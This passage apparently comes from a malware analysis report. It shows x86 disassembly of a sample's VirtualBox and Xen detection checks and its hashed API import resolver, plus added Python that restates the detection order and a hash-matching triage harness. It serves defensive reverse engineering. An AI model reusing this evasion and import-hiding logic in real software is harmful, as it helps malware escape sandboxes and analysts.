00412A81 lea ecx, dword ptr [ebp-0000056Dh]
00412A87 push ecx
00412A88 call 00415F8Fh
00412A8D add esp, 0Ch
00412A90 mov edx, dword ptr [00411FA0h] ASCII "HARDWARE\ACPI\FADT"
00412A96 mov dword ptr [ebp-0000051Ch], edx
00412A9C mov eax, dword ptr [00411FA4h] 45524157
00412AA1 mov dword ptr [ebp-00000518h], eax
00412AA7 mov ecx, dword ptr [00411FA8h] 5043415C
00412AAD mov dword ptr [ebp-00000514h], ecx
00412AB3 mov edx, dword ptr [00411FACh] 41465C49
00412AB9 mov dword ptr [ebp-00000510h], edx
00412ABF mov ax, word ptr [00411FB0h] 5444
00412AC5 mov word ptr [ebp-0000050Ch], ax
00412ACC mov cl, byte ptr [00411FB2h] 00
00412AD2 mov byte ptr [ebp-0000050Ah], cl
00412AD8 push 00000051h
00412ADA push 00000000h
00412ADC lea edx, dword ptr [ebp-00000509h]
00412AE2 push edx
00412AE3 call 00415F8Fh
00412AE8 add esp, 0Ch
00412AEB mov eax, dword ptr [00411FB4h] ASCII "HARDWARE\ACPI\RSDT"
00412AF0 mov dword ptr [ebp-000004B8h], eax
00412AF6 mov ecx, dword ptr [00411FB8h] 45524157
00412AFC mov dword ptr [ebp-000004B4h], ecx
00412B02 mov edx, dword ptr [00411FBCh] 5043415C
00412B08 mov dword ptr [ebp-000004B0h], edx
00412B0E mov eax, dword ptr [00411FC0h] 53525C49
00412B13 mov dword ptr [ebp-000004ACh], eax
00412B19 mov cx, word ptr [00411FC4h] 5444
00412B20 mov word ptr [ebp-000004A8h], cx
00412B27 mov dl, byte ptr [00411FC6h] 00
00412B2D mov byte ptr [ebp-000004A6h], dl
00412B33 push 00000051h
00412B35 push 00000000h
00412B37 lea eax, dword ptr [ebp-000004A5h]
00412B3D push eax
00412B3E call 00415F8Fh
00412B43 add esp, 0Ch
00412B46 mov ecx, 00000007h
00412B4B mov esi, 00411FC8h ASCII "SYSTEM\ControlSet001\Services"
00412B50 lea edi, dword ptr [ebp-00000454h]
00412B56 rep movsd
00412B58 movsw
00412B5A push 00000046h
00412B5C push 00000000h
00412B5E lea ecx, dword ptr [ebp-00000436h]
00412B64 push ecx
00412B65 call 00415F8Fh
00412B6A add esp, 0Ch
00412B6D mov ecx, 00000013h
00412B72 mov esi, 00411FE8h ASCII "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
00412B77 lea edi, dword ptr [ebp-000003F0h]
00412B7D rep movsd
00412B7F movsb
00412B80 xor edx, edx
00412B82 mov dword ptr [ebp-000003A3h], edx
00412B88 mov dword ptr [ebp-0000039Fh], edx
00412B8E mov dword ptr [ebp-0000039Bh], edx
00412B94 mov dword ptr [ebp-00000397h], edx
00412B9A mov dword ptr [ebp-00000393h], edx
00412BA0 mov word ptr [ebp-0000038Fh], dx
00412BA7 mov byte ptr [ebp-0000038Dh], dl
00412BAD mov ecx, 00000007h
00412BB2 mov esi, 00412038h ASCII "HARDWARE\DESCRIPTION\System"
00412BB7 lea edi, dword ptr [ebp-0000038Ch]
00412BBD rep movsd
00412BBF push 00000048h
00412BC1 push 00000000h
00412BC3 lea eax, dword ptr [ebp-00000370h]
00412BC9 push eax
00412BCA call 00415F8Fh
00412BCF add esp, 0Ch
00412BD2 mov ecx, dword ptr [00412054h] ASCII "VBOX__"
00412BD8 mov dword ptr [ebp-00000328h], ecx
00412BDE mov dx, word ptr [00412058h] 5F5F
00412BE5 mov word ptr [ebp-00000324h], dx
00412BEC mov al, byte ptr [0041205Ah] 00
00412BF1 mov byte ptr [ebp-00000322h], al
00412BF7 push 0000005Dh
00412BF9 push 00000000h
00412BFB lea ecx, dword ptr [ebp-00000321h]
00412C01 push ecx
00412C02 call 00415F8Fh
00412C07 add esp, 0Ch
00412C0A mov dl, byte ptr [00411992h] 00
00412C10 mov byte ptr [ebp-000002C4h], dl
00412C16 push 00000063h
00412C18 push 00000000h
00412C1A lea eax, dword ptr [ebp-000002C3h]
00412C20 push eax
00412C21 call 00415F8Fh
00412C26 add esp, 0Ch
00412C29 mov cl, byte ptr [00411993h] 00
00412C2F mov byte ptr [ebp-00000260h], cl
00412C35 push 00000063h
00412C37 push 00000000h
00412C39 lea edx, dword ptr [ebp-0000025Fh]
00412C3F push edx
00412C40 call 00415F8Fh
00412C45 add esp, 0Ch
00412C48 mov al, byte ptr [00411997h] 00
00412C4D mov byte ptr [ebp-000001FCh], al
00412C53 push 00000063h
00412C55 push 00000000h
00412C57 lea ecx, dword ptr [ebp-000001FBh]
00412C5D push ecx
00412C5E call 00415F8Fh
00412C63 add esp, 0Ch
00412C66 mov edx, dword ptr [0041205Ch] ASCII "VBoxMouse"
00412C6C mov dword ptr [ebp-00000198h], edx
00412C72 mov eax, dword ptr [00412060h] 73756F4D
00412C77 mov dword ptr [ebp-00000194h], eax
00412C7D mov cx, word ptr [00412064h] 0065
00412C84 mov word ptr [ebp-00000190h], cx
00412C8B push 0000005Ah
00412C8D push 00000000h
00412C8F lea edx, dword ptr [ebp-0000018Eh]
00412C95 push edx
00412C96 call 00415F8Fh
00412C9B add esp, 0Ch
00412C9E mov eax, dword ptr [00412068h] ASCII "VBoxGuest"
00412CA3 mov dword ptr [ebp-00000134h], eax
00412CA9 mov ecx, dword ptr [0041206Ch] 73657547
00412CAF mov dword ptr [ebp-00000130h], ecx
00412CB5 mov dx, word ptr [00412070h] 0074
00412CBC mov word ptr [ebp-0000012Ch], dx
00412CC3 push 0000005Ah
00412CC5 push 00000000h
00412CC7 lea eax, dword ptr [ebp-0000012Ah]
00412CCD push eax
00412CCE call 00415F8Fh
00412CD3 add esp, 0Ch
00412CD6 mov ecx, dword ptr [00412074h] ASCII "VBoxService"
00412CDC mov dword ptr [ebp-000000D0h], ecx
00412CE2 mov edx, dword ptr [00412078h] 76726553
00412CE8 mov dword ptr [ebp-000000CCh], edx
00412CEE mov eax, dword ptr [0041207Ch] 00656369
00412CF3 mov dword ptr [ebp-000000C8h], eax
00412CF9 push 00000058h
00412CFB push 00000000h
00412CFD lea ecx, dword ptr [ebp-000000C4h]
00412D03 push ecx
00412D04 call 00415F8Fh
00412D09 add esp, 0Ch
00412D0C mov edx, dword ptr [00412080h] ASCII "VBoxSF"
00412D12 mov dword ptr [ebp-6Ch], edx
00412D15 mov ax, word ptr [00412084h] 4653
00412D1B mov word ptr [ebp-68h], ax
00412D1F mov cl, byte ptr [00412086h] 00
00412D25 mov byte ptr [ebp-66h], cl
00412D28 push 0000005Dh
00412D2A push 00000000h
00412D2C lea edx, dword ptr [ebp-65h]
00412D2F push edx
00412D30 call 00415F8Fh
00412D35 add esp, 0Ch
00412D38 mov eax, dword ptr [00412088h] ASCII "Identifier"
00412D3D mov dword ptr [ebp-00000648h], eax
00412D43 mov ecx, dword ptr [0041208Ch] 69666974
00412D49 mov dword ptr [ebp-00000644h], ecx
00412D4F mov dx, word ptr [00412090h] 7265
00412D56 mov word ptr [ebp-00000640h], dx
00412D5D mov al, byte ptr [00412092h] 00
00412D62 mov byte ptr [ebp-0000063Eh], al
00412D68 push 00000059h
00412D6A push 00000000h
00412D6C lea ecx, dword ptr [ebp-0000063Dh]
00412D72 push ecx
00412D73 call 00415F8Fh
00412D78 add esp, 0Ch
00412D7B mov edx, dword ptr [00412094h] ASCII "SystemBiosVersion"
00412D81 mov dword ptr [ebp-000005E4h], edx
00412D87 mov eax, dword ptr [00412098h] 69426D65
00412D8C mov dword ptr [ebp-000005E0h], eax
00412D92 mov ecx, dword ptr [0041209Ch] 6556736F
00412D98 mov dword ptr [ebp-000005DCh], ecx
00412D9E mov edx, dword ptr [004120A0h] 6F697372
00412DA4 mov dword ptr [ebp-000005D8h], edx
00412DAA mov ax, word ptr [004120A4h] 006E
00412DB0 mov word ptr [ebp-000005D4h], ax
00412DB7 push 00000052h
00412DB9 push 00000000h
00412DBB lea ecx, dword ptr [ebp-000005D2h]
00412DC1 push ecx
00412DC2 call 00415F8Fh
00412DC7 add esp, 0Ch
00412DCA mov edx, dword ptr [004120A8h] ASCII "VBOX"
00412DD0 mov dword ptr [ebp-00000650h], edx
00412DD6 mov al, byte ptr [004120ACh] 00
00412DDB mov byte ptr [ebp-0000064Ch], al
00412DE1 xor ecx, ecx
00412DE3 mov word ptr [ebp-04h], cx
00412DE7 jmp 00412DF5h
00412DE9 mov dx, word ptr [ebp-04h] xrefs 00412E2C
00412DED add dx, 0001h
00412DF1 mov word ptr [ebp-04h], dx
00412DF5 movzx eax, word ptr [ebp-04h] xrefs 00412DE7
00412DF9 cmp eax, 03h
00412DFC jnl 00412E2Eh
00412DFE push 00000004h
00412E00 lea ecx, dword ptr [ebp-00000328h]
00412E06 push ecx
00412E07 movzx edx, word ptr [ebp-04h]
00412E0B imul edx, edx, 64h
00412E0E lea eax, dword ptr [ebp+edx-00000580h]
00412E15 push eax
00412E16 call 00413450h
00412E1B add esp, 0Ch
00412E1E movzx ecx, al
00412E21 test ecx, ecx
00412E23 je 00412E2Ch
00412E25 mov al, 01h
00412E27 jmp 00412F26h
00412E2C jmp 00412DE9h xrefs 00412E23
00412E2E movzx edx, word ptr [ebp-04h] xrefs 00412DFC
00412E32 imul edx, edx, 64h
00412E35 lea eax, dword ptr [ebp+edx-00000580h]
00412E3C mov dword ptr [ebp-00000680h], eax
00412E42 push 00000004h
00412E44 lea ecx, dword ptr [ebp-00000198h]
00412E4A push ecx
00412E4B mov edx, dword ptr [ebp-00000680h]
00412E51 push edx
00412E52 call 00413450h
00412E57 add esp, 0Ch
00412E5A movzx eax, al
00412E5D mov cx, word ptr [ebp-04h]
00412E61 add cx, 0001h
00412E65 mov word ptr [ebp-04h], cx
00412E69 test eax, eax
00412E6B je 00412E74h
00412E6D mov al, 01h
00412E6F jmp 00412F26h
00412E74 xor edx, edx xrefs 00412E6B
00412E76 mov word ptr [ebp-00000654h], dx
00412E7D jmp 00412E91h
00412E7F mov ax, word ptr [ebp-00000654h] xrefs 00412EE1
00412E86 add ax, 0001h
00412E8A mov word ptr [ebp-00000654h], ax
00412E91 movzx ecx, word ptr [ebp-00000654h] xrefs 00412E7D
00412E98 cmp ecx, 02h
00412E9B jnl 00412EE3h
00412E9D lea edx, dword ptr [ebp-00000650h]
00412EA3 push edx
00412EA4 movzx eax, word ptr [ebp-00000654h]
00412EAB imul eax, eax, 64h
00412EAE lea ecx, dword ptr [ebp+eax-00000648h]
00412EB5 push ecx
00412EB6 movzx edx, word ptr [ebp-04h]
00412EBA movzx eax, word ptr [ebp-00000654h]
00412EC1 add edx, eax
00412EC3 imul edx, edx, 64h
00412EC6 lea ecx, dword ptr [ebp+edx-00000580h]
00412ECD push ecx
00412ECE call 00413560h
00412ED3 add esp, 0Ch
00412ED6 movzx edx, al
00412ED9 test edx, edx
00412EDB je 00412EE1h
00412EDD mov al, 01h
00412EDF jmp 00412F26h
00412EE1 jmp 00412E7Fh xrefs 00412EDB
00412EE3 xor eax, eax xrefs 00412E9B
00412EE5 mov word ptr [ebp-04h], ax
00412EE9 jmp 00412EF7h
00412EEB mov cx, word ptr [ebp-04h] xrefs 00412F22
00412EEF add cx, 0001h
00412EF3 mov word ptr [ebp-04h], cx
00412EF7 movzx edx, word ptr [ebp-04h] xrefs 00412EE9
00412EFB cmp edx, 02h
00412EFE jnl 00412F24h
00412F00 movzx eax, word ptr [ebp-04h]
00412F04 imul eax, eax, 14h
00412F07 lea ecx, dword ptr [ebp+eax-0000067Ch]
00412F0E push ecx
00412F0F call 00413380h
00412F14 add esp, 04h
00412F17 movzx edx, al
00412F1A test edx, edx
00412F1C je 00412F22h
00412F1E mov al, 01h
00412F20 jmp 00412F26h
00412F22 jmp 00412EEBh xrefs 00412F1C
00412F24 xor al, al xrefs 00412EFE
00412F26 pop edi xrefs 00412F20, 00412EDF, 00412E6F, 00412E27
00412F27 pop esi
00412F28 mov esp, ebp
00412F2A pop ebp
00412F2B ret function end
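The routine at 004129B0 above, together with the Xen variant at 00412F30 listed further down, is a plain indicator sweep: enumerate subkey names under three ACPI table keys and the Services key, search two registry values for a vendor string, and walk the process list. The following Python is an added example (not code from the sample or from the sandbox report) that restates that control flow over constructed enumeration snapshots, so an analyst can see which artifact fires first and in what order. The helpers behind 00413450, 00413560 and 00413380 are assumed to be RegEnumKeyExA name comparison, RegQueryValueExA substring search and Process32First/Next image-name comparison; case-insensitive matching and the `HostSnapshot` layout are assumptions of this example.

```python
from dataclasses import dataclass, field


@dataclass
class HostSnapshot:
    """Constructed stand-in for what the sample enumerates: HKLM subkey
    names per key, HKLM value data per (key, value), running image names."""
    subkeys: dict = field(default_factory=dict)
    values: dict = field(default_factory=dict)
    processes: list = field(default_factory=list)


# Indicator tables copied from the strings listed for 004129B0 (VirtualBox)
# and 00412F30 (Xen). The three zeroed 0x64-byte slots beside "VBOX__" and
# "Xen" in the sample are empty strings and are dropped here.
ACPI_TABLE_KEYS = [r"HARDWARE\ACPI\DSDT", r"HARDWARE\ACPI\FADT", r"HARDWARE\ACPI\RSDT"]
SERVICES_KEY = r"SYSTEM\ControlSet001\Services"
VBOX_ACPI_OEM = ["VBOX__"]
VBOX_SERVICES = ["VBoxMouse", "VBoxGuest", "VBoxService", "VBoxSF"]
VBOX_VALUE_CHECKS = [
    (r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0", "Identifier"),
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
]
VBOX_VALUE_NEEDLE = "VBOX"
VBOX_PROCESSES = ["vboxservice.exe", "vboxtray.exe"]
XEN_PROCESSES = ["xenservice.exe"]
XEN_ACPI_OEM = ["Xen"]
XEN_SERVICES = ["xenevtchn", "xennet", "xennet6", "xensvc", "xenvdb"]


def _norm(s):
    return s.lower()


def subkey_name_matches(snap, key, names):
    """00413450: open HKLM\\key with KEY_ENUMERATE_SUB_KEYS (8), RegEnumKeyExA
    each name into a 0xFF-byte buffer and compare it against every candidate
    (stride 0x64) until ERROR_NO_MORE_ITEMS (0x103)."""
    wanted = {_norm(n) for n in names if n}
    return any(_norm(s) in wanted for s in snap.subkeys.get(_norm(key), []))


def value_contains(snap, key, value_name, needle):
    """00413560 is not on the page; assumed to read HKLM\\key\\value_name and
    search the data for needle."""
    data = snap.values.get((_norm(key), _norm(value_name)))
    return data is not None and _norm(needle) in _norm(data)


def process_present(snap, image_name):
    """00413380: walk the process list via the Process32First/Next wrappers
    at 004136C0 and 004136E0, comparing image names."""
    return _norm(image_name) in {_norm(p) for p in snap.processes}


def detect_virtualbox(snap):
    """Same order as the loops at 00412DF5, 00412E2E, 00412E91 and 00412EF7;
    returns the first indicator that fires, else None."""
    for key in ACPI_TABLE_KEYS:
        if subkey_name_matches(snap, key, VBOX_ACPI_OEM):
            return f"subkey {key}\\VBOX__"
    if subkey_name_matches(snap, SERVICES_KEY, VBOX_SERVICES):
        return "VBox* service key"
    for key, value_name in VBOX_VALUE_CHECKS:
        if value_contains(snap, key, value_name, VBOX_VALUE_NEEDLE):
            return f"value {key}\\{value_name} contains VBOX"
    for image in VBOX_PROCESSES:
        if process_present(snap, image):
            return f"process {image}"
    return None


def detect_xen(snap):
    """00412F30 checks the process first, then the ACPI tables, then services."""
    for image in XEN_PROCESSES:
        if process_present(snap, image):
            return f"process {image}"
    for key in ACPI_TABLE_KEYS:
        if subkey_name_matches(snap, key, XEN_ACPI_OEM):
            return f"subkey {key}\\Xen"
    if subkey_name_matches(snap, SERVICES_KEY, XEN_SERVICES):
        return "xen* service key"
    return None


# Constructed snapshots, not captured data.
BARE_METAL = HostSnapshot(
    subkeys={_norm(r"HARDWARE\ACPI\DSDT"): ["DELL__"],
             _norm(SERVICES_KEY): ["Dhcp", "Tcpip", "disk"]},
    values={(_norm(r"HARDWARE\DESCRIPTION\System"), "systembiosversion"): "DELL   - 1072009"},
    processes=["explorer.exe", "svchost.exe"],
)
VBOX_GUEST = HostSnapshot(
    subkeys={_norm(r"HARDWARE\ACPI\DSDT"): ["VBOX__"],
             _norm(SERVICES_KEY): ["Dhcp", "VBoxGuest"]},
    values={(_norm(VBOX_VALUE_CHECKS[0][0]), "identifier"): "VBOX HARDDISK"},
    processes=["explorer.exe", "VBoxTray.exe"],
)
# A guest whose ACPI OEM id, services and guest-additions processes were
# sanitised but whose SCSI Identifier value still names the vendor.
HARDENED_GUEST = HostSnapshot(
    subkeys={_norm(r"HARDWARE\ACPI\DSDT"): ["DELL__"],
             _norm(SERVICES_KEY): ["Dhcp", "Tcpip"]},
    values={(_norm(VBOX_VALUE_CHECKS[0][0]), "identifier"): "VBOX HARDDISK"},
    processes=["explorer.exe"],
)
```

The `HARDENED_GUEST` case is the one worth keeping in mind when tuning a sandbox: renaming the guest-additions services and processes is not enough, because the SCSI `Identifier` and `SystemBiosVersion` values are checked independently of the subkey sweep.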
APIs
  • LoadLibraryA.KERNEL32, ref: 004158E6
  • LoadLibraryA.KERNEL32, ref: 00415DFC
Address Instruction Meta Information
00415D90 push ebp xrefs 00415E7C
00415D91 mov ebp, esp
00415D93 sub esp, 00000110h
00415D99 mov dword ptr [ebp-04h], 00000000h
00415DA0 jmp 00415DABh
00415DA2 mov eax, dword ptr [ebp-04h] xrefs 00415E35
00415DA5 add eax, 01h
00415DA8 mov dword ptr [ebp-04h], eax
00415DAB cmp dword ptr [ebp-04h], 03h xrefs 00415DA0
00415DAF jnc 00415E3Ah
00415DB5 mov ecx, dword ptr [ebp-04h]
00415DB8 imul ecx, ecx, 06h
00415DBB mov edx, dword ptr [ecx+00416388h]
00415DC1 cmp edx, dword ptr [ebp+0Ch]
00415DC4 jne 00415E35h
00415DC6 mov eax, dword ptr [ebp-04h]
00415DC9 cmp dword ptr [00418C38h+eax*4], 00000000h
00415DD1 jne 00415E1Ah
00415DD3 lea ecx, dword ptr [ebp-00000110h]
00415DD9 push ecx
00415DDA mov edx, dword ptr [ebp-04h]
00415DDD imul edx, edx, 06h
00415DE0 movzx eax, word ptr [edx+0041638Ch]
00415DE7 add eax, 0041639Ah
00415DEC push eax
00415DED call 00415D50h
00415DF2 add esp, 08h
00415DF5 lea ecx, dword ptr [ebp-00000110h]
00415DFB push ecx
00415DFC call dword ptr [00418C44h] LoadLibraryA@KERNEL32.DLL (Hidden Import)
00415E02 mov edx, dword ptr [ebp-04h]
00415E05 mov dword ptr [00418C38h+edx*4], eax
00415E0C mov eax, dword ptr [ebp-04h]
00415E0F cmp dword ptr [00418C38h+eax*4], 00000000h
00415E17 jne 00415E1Ah
00415E19 int3
00415E1A push 00000000h xrefs 00415DD1, 00415E17
00415E1C mov ecx, dword ptr [ebp+08h]
00415E1F push ecx
00415E20 mov edx, dword ptr [ebp-04h]
00415E23 mov eax, dword ptr [00418C38h+edx*4]
00415E2A push eax
00415E2B call 00415760h
00415E30 add esp, 0Ch
00415E33 jmp 00415E3Bh
00415E35 jmp 00415DA2h xrefs 00415DC4
00415E3A int3 xrefs 00415DAF
00415E3B mov esp, ebp xrefs 00415E33
00415E3D pop ebp
00415E3E ret function end
APIs
  • WriteFile.KERNEL32, ref: 004162D0
  • wvsprintfA.USER32, ref: 004160DC
Address Instruction Meta Information
004160BE push ebp xrefs 004155CA, 0041548A
004160BF mov ebp, esp
004160C1 sub esp, 00000400h
004160C7 lea eax, dword ptr [ebp+10h]
004160CA push eax
004160CB push dword ptr [ebp+0Ch]
004160CE lea eax, dword ptr [ebp-00000400h]
004160D4 push eax
004160D5 mov byte ptr [ebp-00000400h], 00000000h
004160DC call dword ptr [00401034h] wvsprintfA@USER32.DLL (Import)
004160E2 push dword ptr [ebp+08h]
004160E5 lea eax, dword ptr [ebp-00000400h]
004160EB push eax
004160EC call 004162AFh
004160F2 pop ecx Count = 2
004160F3 leave
004160F4 ret function end
APIs
  • HeapAlloc.KERNEL32, ref: 00415FFE
  • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041621C
  • CreateFileA.KERNEL32, ref: 00416288
  • SetFilePointer.KERNEL32, ref: 004162A1
Address Instruction Meta Information
00416208 push esi xrefs 004160B5
00416209 mov esi, dword ptr [esp+10h]
0041620D push edi
0041620E xor edi, edi
00416210 cmp esi, edi
00416212 je 0041624Ch
00416214 mov eax, dword ptr [esi]
00416216 cmp eax, FFFFFFFFh
00416219 je 00416222h
0041621B push eax
0041621C call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416222 or dword ptr [esi], FFFFFFFFh xrefs 00416258, 00416219
00416225 or dword ptr [esi+04h], FFFFFFFFh
00416229 push ebx
0041622A mov ebx, dword ptr [esp+14h]
0041622E mov al, byte ptr [ebx]
00416230 cmp al, 61h
00416232 mov edx, C0000000h
00416237 je 00416270h
00416239 cmp al, 72h
0041623B je 00416267h
0041623D cmp al, 77h
0041623F je 0041625Eh
00416241 push esi xrefs 00416293
00416242 call 004162ECh
00416247 pop ecx
00416248 xor eax, eax
0041624A jmp 004162ABh
0041624C push 00000008h xrefs 00416212
0041624E call 00415FF2h
00416253 mov esi, eax
00416255 cmp esi, edi
00416257 pop ecx
00416258 jne 00416222h
0041625A xor eax, eax
0041625C jmp 004162ACh
0041625E mov eax, 40000000h xrefs 0041623F
00416263 push 00000002h
00416265 jmp 00416274h
00416267 mov eax, 80000000h xrefs 0041623B
0041626C push 00000003h
0041626E jmp 00416274h
00416270 mov eax, edx xrefs 00416237
00416272 push 00000004h
00416274 cmp byte ptr [ebx+01h], 0000002Bh xrefs 0041626E, 00416265
00416278 pop ecx
00416279 jne 0041627Dh
0041627B mov eax, edx
0041627E push edi Count = 2
0041627F push ecx
00416280 push edi
00416281 push 00000003h
00416283 push eax
00416284 push dword ptr [esp+28h]
00416288 call dword ptr [00401010h] CreateFileA@KERNEL32.DLL (Import)
0041628E mov edi, eax
00416290 cmp edi, FFFFFFFFh
00416293 je 00416241h
00416295 cmp byte ptr [ebx], 00000061h
00416298 jne 004162A7h
0041629A push 00000002h
0041629E push 00000000h Count = 2
004162A0 push edi
004162A1 call dword ptr [00401014h] SetFilePointer@KERNEL32.DLL (Import)
004162A7 mov dword ptr [esi], edi xrefs 00416298
004162A9 mov eax, esi
004162AB pop ebx xrefs 0041624A
004162AC pop edi xrefs 0041625C
004162AD pop esi
004162AE ret function end
APIs
  • SwitchToThread.KERNEL32, ref: 00415E55
  • Process32Next.KERNEL32, ref: 004136FA
Address Instruction Meta Information
004136E0 push ebp xrefs 004133F3
004136E1 mov ebp, esp
004136E3 mov eax, dword ptr [ebp+0Ch]
004136E6 push eax
004136E7 mov ecx, dword ptr [ebp+08h]
004136EA push ecx
004136EB push 6B5366BEh
004136F0 push C930EA1Eh
004136F5 call 00415E40h
004136FA call eax Process32Next@KERNEL32.DLL (Hidden Import)
004136FC pop ebp
004136FD retn 0008h function end
APIs
  • LoadLibraryA.KERNEL32, ref: 00415DFC
  • SwitchToThread.KERNEL32, ref: 00415E55
Address Instruction Meta Information
00415E40 push ebp xrefs 00413741, 004137A1, 0041377D, 00414AB1, 004149E9, 004141CA, 00414105, 00414A19, 004141F5, 00412265, 00412281, 004122A5, 004137F1, 00414A61, 00414A95, 00413FB9, 00414011, 00414239, 00414AD9, 00414B05, 00414B25, 00414B41, 00414B75, 0041443D, 00414465, 00414481, 0041449D, 004144E5, 00414511, 00414541, 00414565, 00414581, 00413F81, 004145A5, 004137D5, 004136B5, 004136D5, 00413711, 004136F5, 00414191, 00414281, 004156F9, 00414FFD, 00415025, 0041504D, 00415351, 0041536D, 004153A9, 00414121, 00414211, 0041414D, 00414171, 004140C1, 004141AD, 00413FE5, 0041403D, 00414075, 004140A1, 00413F65, 004140E1, 00414261
00415E41 mov ebp, esp
00415E43 push ecx
00415E44 mov eax, 00000001h xrefs 00415E5B
00415E49 mov ecx, 004164ECh
00415E4E xchg dword ptr [ecx], eax
00415E50 cmp eax, 01h
00415E53 jne 00415E5Dh
00415E55 call dword ptr [00418C48h] SwitchToThread@KERNEL32.DLL (Hidden Import)
00415E5B jmp 00415E44h
00415E5D mov edx, dword ptr [ebp+08h] xrefs 00415E53
00415E60 push edx
00415E61 mov ecx, 00416CF0h
00415E66 call 00415980h
00415E6B mov dword ptr [ebp-04h], eax
00415E6E cmp dword ptr [ebp-04h], 00000000h
00415E72 jne 00415E99h
00415E74 mov eax, dword ptr [ebp+0Ch]
00415E77 push eax
00415E78 mov ecx, dword ptr [ebp+08h]
00415E7B push ecx
00415E7C call 00415D90h
00415E81 add esp, 08h
00415E84 mov dword ptr [ebp-04h], eax
00415E87 mov edx, dword ptr [ebp-04h]
00415E8A push edx
00415E8B mov eax, dword ptr [ebp+08h]
00415E8E push eax
00415E8F mov ecx, 00416CF0h
00415E94 call 004159B0h
00415E99 xor ecx, ecx xrefs 00415E72
00415E9B mov edx, 004164ECh
00415EA0 xchg dword ptr [edx], ecx
00415EA2 mov eax, dword ptr [ebp-04h]
00415EA5 mov esp, ebp
00415EA7 pop ebp
00415EA8 retn 0008h function end
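The wrappers at 004136C0, 004136E0 and 00413700 each push two constants (6B5366BE, then a per-function value) and call 00415E40, which spins on the `xchg` lock at 004164EC, tries the cache at 00416CF0, and on a miss calls 00415D90 to match the first constant against the three-entry module table at 00416388, LoadLibraryA the module, and resolve the function by the second constant through 00415760. The hash routine itself is not on the page. The Python below is an added example, not the sample's code, that mirrors that structure and gives a triage harness for checking whether common hash algorithms reproduce the pushed constants; `ror13_add`, `djb2` and `crc32` are labelled guesses, and the export list is constructed, not a real kernel32 export directory.

```python
import threading
import zlib

MASK32 = 0xFFFFFFFF


def ror32(v, n):
    return ((v >> n) | (v << (32 - n))) & MASK32


def ror13_add(name):
    """Classic ROR-13 accumulate; an assumption, not the sample's routine."""
    h = 0
    for b in name.encode("ascii"):
        h = (ror32(h, 13) + b) & MASK32
    return h


def djb2(name):
    h = 5381
    for b in name.encode("ascii"):
        h = (h * 33 + b) & MASK32
    return h


def crc32(name):
    return zlib.crc32(name.encode("ascii")) & MASK32


CANDIDATE_HASHES = {"ror13_add": ror13_add, "djb2": djb2, "crc32": crc32}

# Constructed stand-in for the export directory the real resolver walks.
KERNEL32_EXPORTS = ["CloseHandle", "CreateFileA", "LoadLibraryA", "Process32First",
                    "Process32Next", "SwitchToThread", "WriteFile"]


class HashedImportResolver:
    """Structure of 00415E40 + 00415D90: module table keyed by module hash,
    per-module handle slot filled on first use (the 00418C38 array), and a
    cache of resolved functions keyed by function hash (the 00416CF0 table)."""

    def __init__(self, hash_fn, modules):
        self.hash_fn = hash_fn
        self.modules = {hash_fn(n): (n, exports) for n, exports in modules.items()}
        self.loaded = {}
        self.cache = {}
        self.lock = threading.Lock()   # stands in for the xchg spin at 00415E44

    def resolve(self, func_hash, module_hash):
        with self.lock:
            if func_hash in self.cache:             # 00415980 hit
                return self.cache[func_hash]
            if module_hash not in self.modules:     # 00415E3A: int3, no module
                raise LookupError(f"no module with hash {module_hash:08X}")
            name, exports = self.modules[module_hash]
            self.loaded.setdefault(name, True)      # LoadLibraryA once per module
            for export in exports:                  # export walk inside 00415760
                if self.hash_fn(export) == func_hash:
                    self.cache[func_hash] = export  # 004159B0 cache insert
                    return export
            raise LookupError(f"no export with hash {func_hash:08X} in {name}")


# Constants the sample pushes on this page: (module hash, function hash).
OBSERVED = {
    "Process32First": (0x6B5366BE, 0x19F78C90),
    "Process32Next": (0x6B5366BE, 0xC930EA1E),
    "CloseHandle": (0x6B5366BE, 0x723EB0D5),
}


def match_candidate_algorithms(observed=OBSERVED,
                               module_names=("kernel32.dll", "KERNEL32.DLL", "kernel32")):
    """For each candidate algorithm, list the observed names it reproduces.
    An empty list rules that algorithm out for this sample."""
    report = {}
    for algo, fn in CANDIDATE_HASHES.items():
        hits = [f for f, (_, h) in observed.items() if fn(f) == h]
        hits += [m for m in module_names if fn(m) == observed["CloseHandle"][0]]
        report[algo] = hits
    return report
```

If `match_candidate_algorithms()` returns empty lists for all three, none of the usual algorithms is in play and 00415760 has to be reversed directly; once the real routine is known, dropping it into `CANDIDATE_HASHES` turns the resolver into a tool for labelling every remaining hidden import on the listing.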
APIs
  • SwitchToThread.KERNEL32, ref: 00415E55
  • CloseHandle.KERNEL32, ref: 00413716
Address Instruction Meta Information
00413700 push ebp xrefs 00413442, 00414DAB, 0041532C, 004151B7, 0041517B, 00413D24, 00413D30, 00413D3C, 00413B62, 00413B6E, 00413B7A, 00413B20, 00413B2C, 00413AC2, 00413ACE, 00413A72, 00413A0B
00413701 mov ebp, esp
00413703 mov eax, dword ptr [ebp+08h]
00413706 push eax
00413707 push 6B5366BEh
0041370C push 723EB0D5h
00413711 call 00415E40h
00413716 call eax CloseHandle@KERNEL32.DLL (Import)
00413718 pop ebp
00413719 retn 0004h function end
Strings
  • xenservice.exe, va: 004120B0
  • HARDWARE\ACPI\DSDT, va: 004120C0
  • HARDWARE\ACPI\FADT, va: 004120D4
  • HARDWARE\ACPI\RSDT, va: 004120E8
  • SYSTEM\ControlSet001\Services, va: 004120FC
  • Xen, va: 0041211C
  • xenevtchn, va: 00412120
  • xennet, va: 0041212C
  • xennet6, va: 00412134
  • xensvc, va: 0041213C
  • xenvdb, va: 00412144
Address Instruction Meta Information
00412F30 push ebp xrefs 0041481E
00412F31 mov ebp, esp
00412F33 sub esp, 00000590h
00412F39 push esi
00412F3A push edi
00412F3B mov eax, dword ptr [004120B0h] ASCII "xenservice.exe"
00412F40 mov dword ptr [ebp-00000590h], eax
00412F46 mov ecx, dword ptr [004120B4h] 69767265
00412F4C mov dword ptr [ebp-0000058Ch], ecx
00412F52 mov edx, dword ptr [004120B8h] 652E6563
00412F58 mov dword ptr [ebp-00000588h], edx
00412F5E mov ax, word ptr [004120BCh] 6578
00412F64 mov word ptr [ebp-00000584h], ax
